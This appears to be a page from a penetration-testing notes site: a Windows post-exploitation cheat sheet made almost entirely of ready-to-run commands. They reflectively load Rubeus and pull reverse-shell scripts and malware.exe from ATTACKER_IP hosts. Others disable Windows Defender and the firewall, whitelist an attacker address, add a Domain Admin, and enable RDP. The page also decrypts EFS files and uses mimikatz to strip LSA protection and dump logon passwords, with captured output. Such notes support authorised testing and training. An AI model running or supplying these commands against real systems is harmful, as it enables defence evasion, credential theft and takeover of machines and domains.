Miscellaneous

Reflective Loading

https://twitter.com/alh4zr3d/status/1588178898210017280?s=46&t=3M009y9X9MgpQbkce8qjmw

$d = (New-Object http://System.Net.WebClient).DownloadData('http://<ip>/Rubeus.exe')
$a = [System.Reflection.Assembly]::Load($d)
[Rubeus.Program]::Main("triage".Split())

Windows Defender

# Disable service
sc.exe stop WinDefend

# Disable runtime
Set-MpPreference -DisableRealtimeMonitoring $true

# Remove definitions
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Firewall

Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off

Ip Whitelisting

New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

Changing Permissions of a file

icacls text.txt /grant Everyone:F

Downloading files

IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")  
Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"  

certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe

Adding user to Domain admins

Add-DomainGroupMember -Identity 'Domain Admins' -Members morph3 -Verbose

Base64 Encode-Decode

certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64

Local share

net share
wmic share get /format:list

Remote share

net view
net view \\dc.ecorp.foo /all
wmic /node: dc.ecorp.foo share get

Mounting shares

net use Z: \\127.0.0.1\C$ /user:morph3 password123

Hosting a local smbserver

impacket-smbserver -smb2support morph3-share .

Port Forwarding

# Port forward using plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56

Powershell Portscan

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) "Port $_ is open!"} 2>$null

Recovering Powershell Secure String

######
$user = "morph3"
$file = "morph3-pass.xml"
$cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }

######
[System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR("string"))

######
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result

Injecting PowerShell scripts Into sessions

Invoke-Command -FilePath scriptname -Sessions $sessions
Enter-PSSession -Session $sess

Enable RDP

In cmd.exe,

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

In powershell,

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

net localgroup "Remote Desktop Users" morph3 /add

# Reruling firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

Decrypting EFS files with Mimikatz

Follow the link here How to Decrypt EFS Files

privilege::debug 
token::elevate 
crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert" /export

dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id"

# Clear text password 
dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey" /password:pass123

# After this command you must have the exported .der and .pvk files
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b

openssl x509 -inform DER -outform PEM -in blah.der -out public.pem

openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem

openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# Import the certificate
certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot

type "C:\Users\Administrator\Documents\encrypted.txt"

Patching LSA

https://itm4n.github.io/lsass-runasppl/

Check if LSA Protection is enabled,

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL

Upload mimikatz and mimidrv.sys and patch it using

!+
!processprotect /process:lsass.exe /remove

c:\Users\administrator\Desktop>.\mimikatz_x64.exe
.\mimikatz_x64.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

ERROR mimikatz_doLocal ; "" command of "standard" module not found !

mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 672 -> 00/00 [0-0-0]

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; ...
Session           : Interactive from 0
User Name         : Administrator

...

PreviousPost Exploitation NextUAC Bypass

Last updated 3 years ago

Reflective Loading

Windows Defender

Firewall

Ip Whitelisting

Changing Permissions of a file

Downloading files

Adding user to Domain admins

Base64 Encode-Decode

Network sharing

Port Forwarding

Powershell Portscan

Recovering Powershell Secure String

Injecting PowerShell scripts Into sessions

Enable RDP

Decrypting EFS files with Mimikatz

Patching LSA